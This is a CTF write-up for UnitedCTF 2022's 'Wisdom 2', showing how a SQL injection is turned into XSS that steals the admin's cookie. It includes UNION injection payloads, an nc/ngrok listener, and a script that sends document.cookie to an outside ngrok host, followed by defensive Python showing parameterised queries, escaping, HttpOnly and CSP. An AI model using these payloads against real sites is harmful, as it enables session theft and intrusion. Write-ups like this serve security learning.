Challenge
This is the continuation of Wisdom 1.
Solution
In Wisdom 1 we found a SQL injection in the website’s main page. Now let’s take a look at the second page.
The second page asks for a URL which the admin will take a look at:
If you have done CTFs before, you know that this is a classic XSS challenge, so we need to find a way to get an XSS on this website.
Taking another look back at the first page, I noticed that the query was sent through a GET request, meaning the query was in the URL:
After a little bit of Googling I learnt that you can leverage a SQL injection into an RCE by adding PHP code inside your SELECT statement so that it gets added to the page!
Sadly, the PHP code kept getting sanitized by the backend, even after trying all the weird sanitization-evasion techniques I knew, but it was still worth trying to inject JavaScript instead:
' AND FALSE UNION SELECT "a", "<script>alert()</script>" FROM quotes; -- -
And it worked!
Finally, using ngrok, I could get the admin’s cookie which contained the flag:
nc -lnvp 8000
sudo ngrok http 8000
' AND FALSE UNION SELECT "a", "<script type='text/javascript'>document.location='https://a3ca-132-203-167-165.ngrok.io/?c='+document.cookie;</script>" FROM quotes; -- -
The final link looks like:
┌─[h3dg3h0g@parrotOS]─[~/Desktop/CTF/UnitedCTF2022/Wisdom 2]
└──╼ $nc -lnvp 8000
listening on [any] 8000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 35128
GET /?c=flag=FLAG-us3_http_0nly_c0ok13s_4nd_3nf0rc3_csp! HTTP/1.1
Host: 027f-74-57-165-14.ngrok.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/106.0.5249.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Referer: http://wisdom.ctf.unitedctf.ca/
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 2600:1900:2000:a5::1a
X-Forwarded-Proto: https
This was a great web challenge, mainly because I learnt that you can leverage a SQLi into an RCE by injecting PHP into the page. This wasn't the point of this challenge, but it was still a very cool chain of exploits!
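To show why the chain worked and what the flag text is hinting at, here is an added example (my own code, not the challenge's backend): a string-concatenated search over a constructed `quotes` table reproduces the UNION injection from the writeup, while the parameterised version treats the same input as plain data and output escaping keeps any returned string from becoming a `<script>` tag. The table layout, the column names and the original query shape are assumptions; only the payload is taken verbatim from the writeup.

```python
import html
import sqlite3

# Constructed sample rows; the real table layout is unknown, we only know
# the injection selected two columns FROM quotes.
QUOTES = [
    ("Seneca", "Luck is what happens when preparation meets opportunity."),
    ("Epictetus", "It is not what happens to you, but how you react to it."),
]

# Payload from the writeup, verbatim.
PAYLOAD = "' AND FALSE UNION SELECT \"a\", \"<script>alert()</script>\" FROM quotes; -- -"


def make_db():
    """In-memory SQLite stand-in for the challenge database (constructed)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE quotes (author TEXT, quote TEXT)")
    con.executemany("INSERT INTO quotes VALUES (?, ?)", QUOTES)
    return con


def search_vulnerable(con, q):
    """Assumed shape of the vulnerable query: the GET parameter is pasted
    straight into the SQL text, so the attacker controls the grammar."""
    sql = f"SELECT author, quote FROM quotes WHERE author LIKE '%{q}%'"
    return con.execute(sql).fetchall()


def search_safe(con, q):
    """Same search with a bound parameter: q is data, never parsed as SQL."""
    sql = "SELECT author, quote FROM quotes WHERE author LIKE ?"
    return con.execute(sql, (f"%{q}%",)).fetchall()


def render(rows):
    """Escape on output so a string coming back from the DB cannot become
    markup; this is the second half of the fix, independent of the SQLi."""
    return "".join(f"<li>{html.escape(a)}: {html.escape(t)}</li>" for a, t in rows)


def hardening_headers():
    """Defence in depth the flag names: the cookie is unreadable from
    JavaScript and CSP refuses inline scripts. Cookie value is a placeholder."""
    return {
        "Set-Cookie": "session=<placeholder>; HttpOnly; Secure; SameSite=Lax",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    }
```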